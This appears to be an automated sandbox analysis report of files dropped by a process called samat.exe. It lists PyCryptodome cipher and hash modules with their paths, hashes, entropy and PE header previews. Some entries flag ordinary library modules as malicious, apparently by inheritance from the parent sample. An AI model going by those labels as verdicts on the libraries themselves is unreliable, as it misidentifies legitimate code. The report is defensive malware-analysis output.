Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.:...:...:...3.j.>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...........................PE..d...W..f.........." .....$...>............................................................`..........................................h.......i..d...............................0....a...............................a..8............@...............................text....#.......$.................. ..`.rdata..:-...@.......(..............@..@.data...H....p.......V..............@....pdata...............X..............@..@.rsrc................\..............@..@.reloc..0............^..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_cbc.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	4.7080156150187396
Encrypted:	false
SSDEEP:	192:lF/1n7Guqaj0ktfEJwX1fYwCODR3lncqg0Gd6l:RGXkJEm1feODxDg0Gd6
MD5:	40390F2113DC2A9D6CFAE7127F6BA329
SHA1:	9C886C33A20B3F76B37AA9B10A6954F3C8981772
SHA-256:	6BA9C910F755885E4D356C798A4DD32D2803EA4CFABB3D56165B3017D0491AE2
SHA-512:	617B963816838D649C212C5021D7D0C58839A85D4D33BBAF72C0EC6ECD98B609080E9E57AF06FA558FF302660619BE57CC974282826AB9F21AE0D80FBAA831A1
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d...X..f.........." ................P.....................................................`..........................................8.......8..d....`.......P..X............p..(....1...............................1..8............0...............................text............................... ..`.rdata.......0......................@..@.data...H....@.......&..............@....pdata..X....P.......(..............@..@.rsrc........`.......,..............@..@.reloc..(....p......................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_cfb.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	12800
Entropy (8bit):	5.159963979391524
Encrypted:	false
SSDEEP:	192:kblRgfeqfz0RP767fB4A84DgVD6eDcqgzbkLgmf:BwRj67p84Dg6eVgzbkLgmf
MD5:	899895C0ED6830C4C9A3328CC7DF95B6
SHA1:	C02F14EBDA8B631195068266BA20E03210ABEABC
SHA-256:	18D568C7BE3E04F4E6026D12B09B1FA3FAE50FF29AC3DEAF861F3C181653E691
SHA-512:	0B4C50E40AF92BC9589668E13DF417244274F46F5A66E1FC7D1D59BC281969BA319305BECEA119385F01CC4603439E4B37AFA2CF90645425210848A02839E3E7
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r^..6?..6?..6?..?G..2?..dJ..4?..}G..5?..6?...?..dJ..<?..dJ..>?..dJ..5?...J..7?...J..7?...Jk.7?...J..7?..Rich6?..................PE..d...Y..f.........." ................P.....................................................`..........................................8......x9..d....`.......P..d............p..(....1...............................1..8............0...............................text............................... ..`.rdata.......0......................@..@.data...H....@.......(..............@....pdata..d....P.......*..............@..@.rsrc........`......................@..@.reloc..(....p.......0..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_ctr.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	14848
Entropy (8bit):	5.270418334522813
Encrypted:	false
SSDEEP:	192:vktJ1gifqQGRk0IP73AdXdmEEEEEm9uhiFEQayDZVMcqgnF6+6Lg:vkdU1ID3AdXd49urQPDggnUjLg
MD5:	C4C525B081F8A0927091178F5F2EE103
SHA1:	A1F17B5EA430ADE174D02ECC0B3CB79DBF619900
SHA-256:	4D86A90B2E20CDE099D6122C49A72BAE081F60EB2EEA0F76E740BE6C41DA6749
SHA-512:	7C06E3E6261427BC6E654B2B53518C7EAA5F860A47AE8E80DC3F8F0FED91E122CB2D4632188DC44123FB759749B5425F426CD1153A8F84485EF0491002B26555
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r^z.6?..6?..6?..?G..2?..dJ..4?..}G..5?..6?...?..dJ..<?..dJ..>?..dJ..5?...J..7?...J..7?...J..7?...J..7?..Rich6?..........................PE..d...Y..f.........." ......... ......P.....................................................`.........................................`9.......:..d....`.......P...............p..(....1...............................1..8............0.. ............................text............................... ..`.rdata.......0....... ..............@..@.data........@.......0..............@....pdata.......P.......2..............@..@.rsrc........`.......6..............@..@.reloc..(....p.......8..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_des.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	56832
Entropy (8bit):	4.231032526864278
Encrypted:	false
SSDEEP:	384:0qcmHBeNL1dO/qHkpnYcZiGKdZHDLY84vnKAnK2rZA21agVF:fEiqHHx4vZDV
MD5:	F9E266F763175B8F6FD4154275F8E2F0
SHA1:	8BE457700D58356BC2FA7390940611709A0E5473
SHA-256:	14D2799BE604CBDC668FDE8834A896EEE69DAE0E0D43B37289FCCBA35CEF29EC
SHA-512:	EB3E37A3C3FF8A65DEF6FA20941C8672A8197A41977E35AE2DC6551B5587B84C2703758320559F2C93C0531AD5C9D0F6C36EC5037669DC5CE78EB3367D89877B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........PK..1%..1%..1%..I...1%.D$..1%.I$..1%..1$..1%.D ..1%.D!..1%.D&..1%..D-..1%..D%..1%..D...1%..D'..1%.Rich.1%.........................PE..d...X..f.........." .....6...................................................0............`.................................................\...d...............l............ ..0... ...............................@...8............P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data...H...........................@....pdata..l...........................@..@.rsrc...............................@..@.reloc..0.... ......................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_des3.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	57344
Entropy (8bit):	4.252429732285762
Encrypted:	false
SSDEEP:	384:J4cmHBeIzNweVy/CHkRnYcZiGKdZHDLq80vnKAnKBrZGsURygUX:GEO6CHnX0vZb7
MD5:	DECF524B2D53FCD7D4FA726F00B3E5FC
SHA1:	E87C6ED4004F2772B888C5B5758AA75FE99D2F6F
SHA-256:	58F7053EE70467D3384C73F299C0DFD63EEF9744D61D1980D9D2518974CA92D4
SHA-512:	EAFF4FD80843743E61CE635FBADF4E5D9CF2C3E97F3C48350BD9E755F4423AC6867F9FE8746BD5C54E1402B18E8A55AEEF7ACA098C7CF4186DC4C1235EB35DF2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........PK..1%..1%..1%..I...1%.D$..1%.I$..1%..1$..1%.D ..1%.D!..1%.D&..1%..D-..1%..D%..1%..D...1%..D'..1%.Rich.1%.........................PE..d...X..f.........." .....8...................................................0............`.....................................................d............................ ..0... ...............................@...8............P...............................text...X7.......8.................. ..`.rdata......P.......<..............@..@.data...H...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..0.... ......................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_ecb.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	10240
Entropy (8bit):	4.690163963718492
Encrypted:	false
SSDEEP:	192:Yddz2KTnThIz0qfteRY4zp+D3PLui8p1cqgHCWt:k2E9RqfCXp+D3juRpLgiWt
MD5:	80BB1E0E06ACAF03A0B1D4EF30D14BE7
SHA1:	B20CAC0D2F3CD803D98A2E8A25FBF65884B0B619
SHA-256:	5D1C2C60C4E571B88F27D4AE7D22494BED57D5EC91939E5716AFA3EA7F6871F6
SHA-512:	2A13AB6715B818AD62267AB51E55CD54714AEBF21EC9EA61C2AEFD56017DC84A6B360D024F8682A2E105582B9C5FE892ECEBD2BEF8A492279B19FFD84BC83FA5
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........@................../....../...../......+.......*......-......&....................,....Rich...........................PE..d...X..f.........." ................P........................................p............`.........................................0'.......'..P....P.......@...............`..(....!...............................!..8............ ...............................text............................... ..`.rdata....... ......................@..@.data...H....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..(....`.......&..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_eksblowfish.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22016
Entropy (8bit):	6.1215844022564285
Encrypted:	false
SSDEEP:	384:nUX0JfbRwUtPMbNv37t6K5jwbDEpJgLa0Mp8xCkgJrAm:jNbRw8EbxwKBwbD+gLa1nh
MD5:	3727271FE04ECB6D5E49E936095E95BC
SHA1:	46182698689A849A8C210A8BF571D5F574C6F5B1
SHA-256:	3AF5B35DCD5A3B6C7E88CEE53F355AAFFF40F2C21DABD4DE27DBB57D1A29B63B
SHA-512:	5BED1F4DF678FE90B8E3F1B7C4F68198463E579209B079CB4A40DCAC01CE26AA2417DBE029B196F6F2C6AFAD560E2D1AF9F089ABE37EAD121CA10EE69D9659ED
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d...W..f.........." .....(...0......P.....................................................`.........................................0Y.......Y..d............p..................0....Q...............................R..8............@...............................text...H'.......(.................. ..`.rdata.......@... ...,..............@..@.data...H....`.......L..............@....pdata.......p.......N..............@..@.rsrc................R..............@..@.reloc..0............T..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_ocb.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	17920
Entropy (8bit):	5.293810509074883
Encrypted:	false
SSDEEP:	384:4PHoDUntQjNB+/yw/pogeXOvXoTezczOo3p9iJgDQ3iNgnVbwhA:dUOhBcDRogeXOfoTezcio3pUJgDQ3i+
MD5:	78AEF441C9152A17DD4DC40C7CC9DF69
SHA1:	6BB6F8426AFA6522E647DFC82B1B64FAF3A9781F
SHA-256:	56E4E4B156295F1AAA22ECB5481841DE2A9EB84845A16E12A7C18C7C3B05B707
SHA-512:	27B27E77BE81B29D42359FE28531225383860BCD19A79044090C4EA58D9F98009A254BF63585979C60B3134D47B8233941ABB354A291F23C8641A4961FA33107
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...Y..f.........." .....(... ......P.....................................................`.........................................pI......lJ..d....p.......`..................(....A...............................A..8............@...............................text....'.......(.................. ..`.rdata.......@.......,..............@..@.data........P.......<..............@....pdata.......`.......>..............@..@.rsrc........p.......B..............@..@.reloc..(............D..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_ofb.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	11776
Entropy (8bit):	4.862619033406922
Encrypted:	false
SSDEEP:	96:0Ga+F/1NtJ9t4udqaj01rlALnNNJSS2sP+YEdMN+F9FdKaWDULk+VOmWbucX6gR7:PF/1n7Guqaj0ktfEON+bMDUlJcqg0Gd
MD5:	19E0ABF76B274C12FF624A16713F4999
SHA1:	A4B370F556B925F7126BF87F70263D1705C3A0DB
SHA-256:	D9FDA05AE16C5387AB46DC728C6EDCE6A3D0A9E1ABDD7ACB8B32FC2A17BE6F13
SHA-512:	D03033EA5CF37641FBD802EBEB5019CAEF33C9A78E01519FEA88F87E773DCA92C80B74BA80429B530694DAD0BFA3F043A7104234C7C961E18D48019D90277C8E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d...Y..f.........." ................P.....................................................`..........................................8.......8..d....`.......P..X............p..(....1...............................1..8............0...............................text............................... ..`.rdata.......0......................@..@.data...H....@.......$..............@....pdata..X....P.......&..............@..@.rsrc........`.......*..............@..@.reloc..(....p.......,..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_BLAKE2b.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	14336
Entropy (8bit):	5.227045547076371
Encrypted:	false
SSDEEP:	192:saF/1n7Guqaj0ktrE8o2o+V2rQnjt1wmg9jtveDn4clG6VcqgOvgdd:swGXkFE8Zo+AojO9jZeDf5rgOvgz
MD5:	309D6F6B0DD022EBD9214F445CAC7BB9
SHA1:	ABD22690B7AD77782CFC0D2393D0C038E16070B0
SHA-256:	4FBE188C20FB578D4B66349D50AA6FFE4AB86844FB6427C57738F36780D1E2E2
SHA-512:	D1951FE92F83E7774E8E877815BED6E6216D56EF18B7F1C369D678CB6E1814243659E9FA7ABC0D22FB5B34A9D50A51D5A89BA00AE1FDD32157FD0FF9902FB4B7
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d...U..f.........." ................P.....................................................`..........................................8.......9..d....`.......P..@............p..(....2...............................2..8............0...............................text...x........................... ..`.rdata.......0....... ..............@..@.data...H....@......................@....pdata..@....P.......0..............@..@.rsrc........`.......4..............@..@.reloc..(....p.......6..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_BLAKE2s.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	13824
Entropy (8bit):	5.176369829782773
Encrypted:	false
SSDEEP:	192:rF/1n7Guqaj0ktrESsrUW+SBjsK5tcQmEreD2mf1AoxkVcqgOvgXQ:rGXkFE/UW575tA2eDp1Ao2rgOvgX
MD5:	D54FEB9A270B212B0CCB1937C660678A
SHA1:	224259E5B684C7AC8D79464E51503D302390C5C9
SHA-256:	032B83F1003A796465255D9B246050A196488BAC1260F628913E536314AFDED4
SHA-512:	29955A6569CA6D039B35BB40C56AEEB75FC765600525D0B469F72C97945970A428951BAB4AF9CD21B3161D5BBA932F853778E2674CA83B14F7ABA009FA53566F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d...U..f.........." ................P.....................................................`..........................................8.......9..d....`.......P..@............p..(....2...............................2..8............0...............................text...h........................... ..`.rdata.......0......................@..@.data...H....@.......,..............@....pdata..@....P......................@..@.rsrc........`.......2..............@..@.reloc..(....p.......4..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_MD2.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	14336
Entropy (8bit):	5.047563322651927
Encrypted:	false
SSDEEP:	384:6alCvH32p3/2pnEhKnLg9yH8puzoFaPERIQAvHD9CIg5kP:5CvHmp3OpnEhmLg9yH8puzoFaPERIQgI
MD5:	52DCD4151A9177CF685BE4DF48EA9606
SHA1:	F444A4A5CBAE9422B408420115F0D3FF973C9705
SHA-256:	D54375DC0652358A6E4E744F1A0EAEEAD87ACCD391A20D6FF324FE14E988A122
SHA-512:	64C54B89F2637759309ECC6655831C3A6755924ED70CBC51614061542EB9BA9A8AECF6951EB3AB92447247DC4D7D846C88F4957DBBE4484A9AB934343EE27178
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...Q..f.........." ......... ......P.....................................................`.........................................@9.......9..d....`.......P..(............p..(....2...............................2..8............0...............................text...X........................... ..`.rdata..@....0......................@..@.data...x....@......................@....pdata..(....P.......0..............@..@.rsrc........`.......4..............@..@.reloc..(....p.......6..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_MD4.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	13824
Entropy (8bit):	5.09893680790018
Encrypted:	false
SSDEEP:	192:xsiXeqVb0lwbH4P01sAD7I/9hAkwDWzBEbcqgqLg:valqH4M1sAD7KvpwDFtgqLg
MD5:	F929B1A3997427191E07CF52AC883054
SHA1:	C5EA5B68586C2FB09E5FDD20D4DD616D06F5CBA6
SHA-256:	5386908173074FABD95BF269A9DF0A4E1B21C0576923186F449ABF4A820F6A8E
SHA-512:	2C79DBCE2C21214D979AB86DD989D41A3AFA7FCB7F3B79BA9974E2EE8F832DD7CA20C1C87C0C380DB037D776FE6D0851D60AD55A08AFDE0003B7E59214DD2F3B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...R..f.........." ................P.....................................................`.........................................08.......8..d....`.......P..(............p..(....1...............................2..8............0...............................text............................... ..`.rdata..0....0......................@..@.data........@.......,..............@....pdata..(....P......................@..@.rsrc........`.......2..............@..@.reloc..(....p.......4..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_MD5.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	15360
Entropy (8bit):	5.451865349855574
Encrypted:	false
SSDEEP:	384:KfwogDHER1wuiDSyoGTgDZOviNgEPrLg:ugDHELwuiDScTgDwi+EP
MD5:	1FA5E257A85D16E916E9C22984412871
SHA1:	1AC8EE98AD0A715A1B40AD25D2E8007CDC19871F
SHA-256:	D87A9B7CAD4C451D916B399B19298DC46AAACC085833C0793092641C00334B8E
SHA-512:	E4205355B647C6E28B7E4722328F51DC2EB3A109E9D9B90F7C53D7A80A5A4B10E40ABDDAB1BA151E73EF3EB56941F843535663F42DCE264830E6E17BB659EADF
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...R..f.........." ..... ..........P.....................................................`..........................................8......`9..d....`.......P..X............p..(....1...............................1..8............0...............................text............ .................. ..`.rdata.......0.......$..............@..@.data........@.......2..............@....pdata..X....P.......4..............@..@.rsrc........`.......8..............@..@.reloc..(....p.......:..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_RIPEMD160.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	13824
Entropy (8bit):	5.104245335186531
Encrypted:	false
SSDEEP:	192:3F/1n7Guqaj0kt7/Ev9kt0Qwac6QzD8iD0QocqgI4G0S:nGXkd/EvGt9wacNDvAgI4v
MD5:	FAD578A026F280C1AE6F787B1FA30129
SHA1:	9A3E93818A104314E172A304C3D117B6A66BEB55
SHA-256:	74A1FF0801F4704158684267CD8E123F83FB6334FE522C1890AC4A0926F80AB1
SHA-512:	ACF8F5B382F3B4C07386505BBDCAF625D13BCC10AA93ED641833E3548261B0AD1063E2F59BE2FCD2AFAF3D315CB3FC5EB629CEFC168B33CFD65A3A6F1120F7FF
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d...U..f.........." ......... ......P.....................................................`..........................................9.......:..d....`.......P...............p..(...@3..............................`3..8............0...............................text...H........................... ..`.rdata.......0......................@..@.data...H....@.......,..............@....pdata.......P......................@..@.rsrc........`.......2..............@..@.reloc..(....p.......4..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_SHA1.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	17920
Entropy (8bit):	5.671305741258107
Encrypted:	false
SSDEEP:	384:APHoDUntQj0sKhDOJ+0QPSfu6rofDjiZzgE+kbwb:VUOYsKNO466DjoUE+
MD5:	556E6D0E5F8E4DA74C2780481105D543
SHA1:	7A49CDEF738E9FE9CD6CD62B0F74EAD1A1774A33
SHA-256:	247B0885CF83375211861F37B6DD1376AED5131D621EE0137A60FE7910E40F8B
SHA-512:	28FA0CE6BDBCC5E95B80AADC284C12658EF0C2BE63421AF5627776A55050EE0EA0345E30A15B744FC2B2F5B1B1BBB61E4881F27F6E3E863EBAAEED1073F4CDA1
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h..9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...R..f.........." ...............P.....................................................`..........................................H......hI..d....p.......`..X...............(....A...............................A..8............@...............................text....).......*.................. ..`.rdata.......@......................@..@.data........P.......<..............@....pdata..X....`.......>..............@..@.rsrc........p.......B..............@..@.reloc..(............D..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_SHA224.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	21504
Entropy (8bit):	5.878701941774916
Encrypted:	false
SSDEEP:	384:EJWo4IRCGHX1KXqHGcvYHp5RYcARQOj4MSTjqgPmJD1OhgkxEv:EcIRnHX1P/YtswvaD1Rk
MD5:	2F2655A7BBFE08D43013EDDA27E77904
SHA1:	33D51B6C423E094BE3E34E5621E175329A0C0914
SHA-256:	C734ABBD95EC120CB315C43021C0E1EB1BF2295AF9F1C24587334C3FCE4A5BE1
SHA-512:	8AF99ACC969B0E560022F75A0CDCAA85D0BDEADADEACD59DD0C4500F94A5843EA0D4107789C1A613181B1F4E5252134A485EF6B1D9D83CDB5676C5FEE4D49B90
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...S..f.........." .....6... ......P.....................................................`.........................................@Z......([..d............p..................(....R...............................R..8............P...............................text....5.......6.................. ..`.rdata..x....P.......:..............@..@.data........`.......J..............@....pdata.......p.......L..............@..@.rsrc................P..............@..@.reloc..(............R..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_SHA256.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	21504
Entropy (8bit):	5.881781476285865
Encrypted:	false
SSDEEP:	384:EJWo4IRCGHXfKXqHGcvYHp5RYcARQOj4MSTjqgPmJD12gkxEv:EcIRnHXfP/YtswvaD1zk
MD5:	CDE035B8AB3D046B1CE37EEE7EE91FA0
SHA1:	4298B62ED67C8D4F731D1B33E68D7DC9A58487FF
SHA-256:	16BEA322D994A553B293A724B57293D57DA62BC7EAF41F287956B306C13FD972
SHA-512:	C44FDEE5A210459CE4557351E56B2D357FD4937F8EC8EACEAB842FEE29761F66C2262FCBAAC837F39C859C67FA0E23D13E0F60B3AE59BE29EB9D8ABAB0A572BB
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...S..f.........." .....6... ......P.....................................................`.........................................@Z......([..d............p..................(....R...............................R..8............P...............................text....5.......6.................. ..`.rdata..x....P.......:..............@..@.data........`.......J..............@....pdata.......p.......L..............@..@.rsrc................P..............@..@.reloc..(............R..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_SHA384.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	26624
Entropy (8bit):	5.837887867708438
Encrypted:	false
SSDEEP:	768:e839Cc4itui0gel9soFdkO66MlPGXmXcyYDTzks:Ns4u/FZ6nPxMLDvk
MD5:	999D431197D7E06A30E0810F1F910B9A
SHA1:	9BFF781221BCFFD8E55485A08627EC2A37363C96
SHA-256:	AB242B9C9FB662C6F7CB57F7648F33983D6FA3BB0683C5D4329EC2CC51E8C875
SHA-512:	A5DD92DD471ADB44EEFE5919EF9CA3978724E21174DF5B3A9C1F0AB462F928E5A46A460D02417DB7522F5DE3BFEED5EEE6B1EAFAF3E621722E85E72675F7096F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...T..f.........." .....H..."......P.....................................................`..........................................k.......l..d...............................(...pd...............................d..8............`...............................text....F.......H.................. ..`.rdata.......`.......L..............@..@.data................^..............@....pdata...............`..............@..@.rsrc................d..............@..@.reloc..(............f..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_SHA512.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	26624
Entropy (8bit):	5.895310340516013
Encrypted:	false
SSDEEP:	768:lcX9Nf4ttui0gel9soFdkO66MlPGXmXc/vDTOvk:a38u/FZ6nPxM3DAk
MD5:	0931ABBF3AED459B1A2138B551B1D3BB
SHA1:	9EC0296DDAF574A89766A2EC035FC30073863AB0
SHA-256:	1729A0DC6B80CB7A3C07372B98B10D3C6C613EA645240878E1FDE6A992FA06F1
SHA-512:	9F970BB4D10B94F525DDDDE307C7DA5E672BBFB3A3866A34B89B56ADA99476724FD690A4396857182749294F67F36DB471A048789FB715D2A7DAF46917FC1947
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
